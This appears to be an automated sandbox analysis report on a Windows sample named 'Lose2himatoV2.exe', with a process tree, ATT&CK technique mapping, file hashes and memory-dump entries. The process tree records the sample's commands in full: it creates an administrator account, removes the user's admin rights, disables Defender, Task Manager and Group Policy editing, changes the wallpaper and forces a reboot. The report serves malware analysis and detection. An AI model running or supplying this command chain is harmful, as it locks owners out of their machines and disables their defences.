  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4980 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
  2⤵
  PID:2532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4052

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5520

C:\Users\Admin\Desktop\Lose2himatoV2.exe
"C:\Users\Admin\Desktop\Lose2himatoV2.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5740
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6056
- - C:\Windows\SysWOW64\net.exe
    net user Lose2himato /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Lose2himato /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:4812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6088
- - C:\Windows\SysWOW64\net.exe
    net user Lose2himato dumbass
    3⤵
    - System Location Discovery: System Language Discovery
    PID:832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Lose2himato dumbass
      4⤵
      System Location Discovery: System Language Discovery
      PID:5356
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6132
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "Lose2himato" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - System Location Discovery: System Language Discovery
  PID:4960
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "Admin" /delete
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5536
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:2444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3112
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5432
- C:\Windows\SysWOW64\explorer.exe
  "explorer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:4476
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5752
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5648
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5916
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5928
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2472
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
    3⤵
    PID:832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe25bf46f8,0x7ffe25bf4708,0x7ffe25bf4718
      4⤵
      PID:6120
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
    3⤵
    PID:6128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe25bf46f8,0x7ffe25bf4708,0x7ffe25bf4718
      4⤵
      PID:1572
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
    3⤵
    PID:6140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffe25bf46f8,0x7ffe25bf4708,0x7ffe25bf4718
      4⤵
      PID:6092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c shutdown /r
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1308
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3504

C:\Windows\system32\CredentialEnrollmentManager.exe
C:\Windows\system32\CredentialEnrollmentManager.exe
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k WbioSvcGroup -s WbioSrvc
1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3842855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\40fbb1ff-158b-4178-acf8-2b6e124cb773.tmp

Filesize
1KB

MD5
37d24e7679d958a7f236a421f1a6f865

SHA1
4bffa38bef152833ae3e77619480dc1ef9c8f8e6

SHA256
f921074c20f8fdecddc6cd0e767ade98b191121d81c36466e487bbbb796e981b

SHA512
6eed0c42615245a5a2d8bba83646a20ecf07d586e0ba451275efaed8196ad38e067becfa17014030949a14019a6145f3f5ca265f5ad743fe09282304db3560f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
1cfe80810a30e8e5a83a03328c747401

SHA1
054641b966b5de5827c82eb968c6f369fab887eb

SHA256
2a76e74adffb45173b34d2f07aad60721df781ee10f00f23b430e31a5dfa5cca

SHA512
7c119f2eecef3161701a8d771c38f6081c0772b86084a46ecf1aa39113821a34cd16db270ed1ceea354aae5f4f409b209958585d362245015f506aaaaac67493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
d6a54954106cb9d140238e79304be030

SHA1
04db60566ed2e81ceb589e7755bf7eafe06ecaaf

SHA256
bdf2a4b528d26c39019eeb22fa711925b1f84eb4e61d99fa987f65eee02f52ca

SHA512
c1b961d829db55d1d6b3cc515b3d0db3b1ed9051cb07d9f04729ce0e661fe97ab2caf97459d6efe67626cd157c10fd176a36295bcfc60f7767b9cd8ff7eefbd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
7fe9681bf0974a1802afdfac98629656

SHA1
afef99d9ccb3784c6946c1a2baaaaedee576c4fb

SHA256
f6a50c267f5a71e8015733566fc5fe4b6dd90fccb14d3dc847ac8650ff2fc743

SHA512
57618a61aadb6b4e55fbef22e8c38e9ce5f9d5ee8f9d30e2607a0e42f071680dc77700646d14c898ec0ab2c80556eee076067128c5123eb1f4a90e131e85f014

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
51506639cf0b8887f01037d7053cfb00

SHA1
9507d555e00f9ae261f06c7e248fc1f8c1f4ae69

SHA256
111c43b0afc29e1384a295b8b4d8ae2d7c9b19007801515d22da66cc6a0765e3

SHA512
5a1f4cfc4ddacb80276a56c701a362912a6b9791654ae8bf676e45d8817801b1181ccb586275294ec99b34a3c7654f431818265c97ca0be487449d240f81cb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
391600b4d8e975eda4247daae8d0d2fb

SHA1
5f783893d7b79677b9e79e4d26d2435c73db4120

SHA256
07d7d678328764c81e4b9bf76c92d818eb525f9dabb41f0b6adb5ebdd64a3c74

SHA512
668a434d947f28073483a1219afa8dc52a772174be4775f9d63dae17e8f261537afa17c19a1910f1da5998481c574e1095c25ab25b738ae75f60799b19971f63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b3312cfe167ff98212c167b9f2f05911

SHA1
e4a9e7f8b62fa715066a02653b45591a9d88935c

SHA256
9343bbc6e723d7b87121023ee28674270a6854c814385920e93cd4d1db7dd394

SHA512
601e8bd80e601fe3a72c2c76480ca41575fafac5b6a7f9e165afeb936bb53aa47c52958cafc208746ecb4c904b68e33e321c962a30dfcadf8a54fa0df7889bb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
5e5bd5c02f687deb7a2d5e1d19a25b76

SHA1
928c95692cb625d4cf4c4ef6ae040aff90323b71

SHA256
99cc8c59aac7f4c34662fff9f9b5f7e882c6cda04c31a9ef045469a171274c4e

SHA512
bbc6d89c2370486ca129717cfc5f17b9e178eb76e62c5e827aceee6bd0ec196b0983a1096b068a3c934fa8cfb51e9868c90e10c194399e97c169fa1a7e827d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5931cba987ab39dd9318e427a52faa2d

SHA1
ddd04d184aaadf981275137f719f83592297212d

SHA256
a46a8e7ef8b6134dc2dc92e5d4041aafc1636af7c57a7b5ee652abbd9c19c161

SHA512
6f3886e407efdad97c658c1c9baf09273f21c6e27ae2f05d78ab65f782188f815606affe6804c5d4e397c933d49229372fbd04ac51cfff5e7b856c42154a7f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
9fe6aa6dbd90dfe33fbe1132ad9bf87d

SHA1
4044b08ab067f643e26f7fd7c35c2bcf84e3c390

SHA256
e141bc3f4828a1d001f82ce8eab7f9a187566fcf3104e7d771e33010038f1b2f

SHA512
cc816dac921c18c1f0aaa18f1a82acb449fd07d330117012b297459a629894259c57cf2cc447ac8f1d679e0cab60806dcc17b59f04ec01562c3e67cb455c8250

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
b44342ee6cd1fc4148171dae68c49165

SHA1
3f1d34dde629b52753b7dbd3be0d297ff4ad3394

SHA256
ffad45efa449a9561fa7d1b7deea9d33f262e80d3b59300fb3bb3fad45e6736a

SHA512
56e42733975d5f2ea1a3938eb001b1af16f74f3b470ec6f9ebfea02fc902c05e8de0a300f62f131a1cc99d0130d11de40b46d4f36b84286c84ba4641e6e9bff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ab6b225d9b37cd37f1522ad2f47e3d52

SHA1
49109d9e3dec415c5f240f9032ac16b10ed4ba9a

SHA256
5bc1ad6a268e74e970a4761f20e9426fcefbbfdec85ad2b0a99d8bc9002db3c7

SHA512
41a4e56baadc0b70d709b34ca8e915dc377728e35dd1b76c738f2485e066c918fc473e9de3ffd17ef41670d07f0dd968fb67c364088301088221c30804cc1573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58a64d.TMP

Filesize
536B

MD5
520007b2dc92e9bf3d5c9ee1ba3aa286

SHA1
155c5519a2fc98a9efa093313c2506aad0cfca30

SHA256
c7be015dadf3ff4f9e3c3445914c0fc5ea172dea56201588e2d8d06925b6e0e5

SHA512
4583c89593336bed8c35f6f61ad1c91ac2ae92fb9414a192f80044d7b0c0fbfb0adda773f5bf22538e86f398852b4aa4a0216a198fe247eb873b35d3d3714189

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c34a4dc28208aad992727af65652eb79

SHA1
7759b10cd9801343e112dc0a7863d114d58b3765

SHA256
e5aed6e743b6fb10953b441d7d471fea467d4c00d0815156bd95b1d37da290cf

SHA512
466882b3308d80f681f353468e5196b0ed1f6b3330cb7adeae5337fa632cdc9fcdecff52156dca7e23d2074937ef9bc211b6abeb24a309b6b69195ec1d441980

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9474f1e3d3000b2698382e8ffd496cb1

SHA1
2d36ff99ee29de63dfa7f02874c918ec03745f44

SHA256
f21be0645203a9001d64466cc5af5e3f11b16842434e1ed6106cdab094c6579b

SHA512
ccc31b2d261c6cda40818f897aec0877d8c73fe04f1ccab33fe5887117c11f691573991ca188582dc2fc057474725aa290a1364cdbda23202f4d9c005414bd2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d5e6b7cf3c9ca9f9f2807b0282b94b1a

SHA1
c134ff717d1239876f6c7eec5dc8a733513c26df

SHA256
a92785e916f0d35a458ff65c5a7213c2cab98f6674d551b0099a5740beb95513

SHA512
4b23bced72fdeef162cc556b439696a94f9f0bbf4583a78c26a3ea3482a589ad8b16c94f48740ebe868c28ba8bce20de6189bae693d54b8d3a47cb09344bec35

Download Submit
memory/5740-173-0x0000000006C70000-0x0000000006C8F000-memory.dmp

Filesize
124KB

Download
memory/5740-161-0x0000000008D70000-0x0000000008E24000-memory.dmp

Filesize
720KB

Download
memory/5740-153-0x0000000006C10000-0x0000000006C22000-memory.dmp

Filesize
72KB

Download
memory/5740-172-0x0000000006C90000-0x0000000006CCA000-memory.dmp

Filesize
232KB

Download
memory/5740-169-0x0000000006C90000-0x0000000006CCA000-memory.dmp

Filesize
232KB

Download
memory/5740-168-0x0000000006B90000-0x0000000006B96000-memory.dmp

Filesize
24KB

Download
memory/5740-165-0x0000000006B90000-0x0000000006B96000-memory.dmp

Filesize
24KB

Download
memory/5740-164-0x0000000008D70000-0x0000000008E24000-memory.dmp

Filesize
720KB

Download
memory/5740-152-0x0000000006BE0000-0x0000000006C08000-memory.dmp

Filesize
160KB

Download
memory/5740-149-0x0000000006BE0000-0x0000000006C08000-memory.dmp

Filesize
160KB

Download
memory/5740-180-0x0000000006CD0000-0x0000000006CE5000-memory.dmp

Filesize
84KB

Download
memory/5740-176-0x0000000006C70000-0x0000000006C8F000-memory.dmp

Filesize
124KB

Download
memory/5740-177-0x0000000006CD0000-0x0000000006CE5000-memory.dmp

Filesize
84KB

Download
memory/5740-156-0x0000000006C10000-0x0000000006C22000-memory.dmp

Filesize
72KB

Download
memory/5740-160-0x0000000006BA0000-0x0000000006BAC000-memory.dmp

Filesize
48KB

Download
memory/5740-157-0x0000000006BA0000-0x0000000006BAC000-memory.dmp

Filesize
48KB

Download
memory/5740-144-0x0000000006B60000-0x0000000006B73000-memory.dmp

Filesize
76KB

Download
memory/5740-145-0x0000000006BB0000-0x0000000006BD3000-memory.dmp

Filesize
140KB

Download
memory/5740-148-0x0000000006BB0000-0x0000000006BD3000-memory.dmp

Filesize
140KB

Download
memory/5740-141-0x0000000006B60000-0x0000000006B73000-memory.dmp

Filesize
76KB

Download
memory/5740-125-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/5740-128-0x00000000069C0000-0x00000000069D1000-memory.dmp

Filesize
68KB

Download
memory/5740-131-0x00000000069C0000-0x00000000069D1000-memory.dmp

Filesize
68KB

Download
memory/5740-124-0x0000000008E40000-0x0000000009A29000-memory.dmp

Filesize
11.9MB

Download
memory/5740-121-0x0000000008E40000-0x0000000009A29000-memory.dmp

Filesize
11.9MB

Download
memory/5740-120-0x0000000007140000-0x0000000007ACA000-memory.dmp

Filesize
9.5MB

Download
memory/5740-118-0x0000000007140000-0x0000000007ACA000-memory.dmp

Filesize
9.5MB

Download